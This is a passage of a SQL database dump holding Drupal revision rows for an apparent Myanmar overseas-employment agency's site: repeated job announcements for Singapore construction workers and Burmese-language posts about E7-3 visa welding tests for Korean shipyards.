('announcement', 0, 5, 326, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 326, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><p><br>勤務時間 -<br>午前8時から午後5時まで（1日8時間）<br>給与: 1日あたり20シンガポールドル<br>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.<br>食事は自己管理で行っていただく必要があります。<br>寮の生活費は支払う必要はありません。<br>オフィス/会社は交通手段としてフェリーをサポートしています。<br>年齢が20歳から35歳の健康でアクティブな方々を募集しています。<br>学歴の要件はありません。<br>英語を少し話し、理解できるだけで十分です。</p><p>Contact Us</p><p>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 326, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 340, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 340, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><p><br>勤務時間 -<br>午前8時から午後5時まで（1日8時間）<br>給与: 1日あたり20シンガポールドル<br>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.<br>食事は自己管理で行っていただく必要があります。<br>寮の生活費は支払う必要はありません。<br>オフィス/会社は交通手段としてフェリーをサポートしています。<br>年齢が20歳から35歳の健康でアクティブな方々を募集しています。<br>学歴の要件はありません。<br>英語を少し話し、理解できるだけで十分です。</p><p>Contact Us</p><p>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 340, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 359, 'en', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 359, 'ja', 0, '<p>パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。</p><p><br>勤務時間 -<br>午前8時から午後5時まで（1日8時間）<br>給与: 1日あたり20シンガポールドル<br>5時以降に残業が必要な場合、残業手当は通常の給与の1.5倍となります.<br>食事は自己管理で行っていただく必要があります。<br>寮の生活費は支払う必要はありません。<br>オフィス/会社は交通手段としてフェリーをサポートしています。<br>年齢が20歳から35歳の健康でアクティブな方々を募集しています。<br>学歴の要件はありません。<br>英語を少し話し、理解できるだけで十分です。</p><p>Contact Us</p><p>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 5, 359, 'ko', 0, '<p>5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.</p><h3><br><sub>Work Hours-</sub></h3><ul><li>From 8 AM to 5 PM (8 hours per day)</li><li>Salary: 20 Singapore dollar per day</li><li>If needed to work overtime after 5 pm, get &nbsp;1.5 times overtime fees</li><li>Have to arrange meals by yourselves</li><li>No need to pay living (hostel) fees</li><li>Office/Company &nbsp;supports ferry for transportation</li><li>Those who aged between 20 to 35, healthy and active</li><li>No need to have educational background</li><li>Can speak and understand English little is enough.</li></ul><h3><br>Contact Us</h3><p><br>NEW COMET TRADING AGENCY CO.,LTD (095556677, 09950947491,095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 6, 11, 'en', 0, '<img data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\" src=\"/new_comet/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\"><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 6, 21, 'en', 0, '<img src=\"/new_comet/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 6, 24, 'en', 0, '<img src=\"/new_comet/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p><p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 6, 33, 'en', 0, '<img src=\"/new_comet/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 6, 45, 'en', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 6, 115, 'en', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 6, 115, 'ja', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 6, 116, 'en', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 6, 116, 'ja', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 6, 116, 'ko', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
('activities', 0, 6, 151, 'en', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>In order to get employed to the shipyard in Korea with an E7-3 Visa, the trainees are explained what is needed to quickly come and check the welding exam.</p>', '', 'full_html'),
('activities', 0, 6, 151, 'ja', 0, '<img src=\"/sites/default/files/inline-images/E7-3_visa_korea.jpg\" data-align=\"center\" data-entity-uuid=\"e857287c-31d2-45cd-8d5c-c00dbf296637\" data-entity-type=\"file\"><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p><p>ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား</p>', '', 'full_html'),
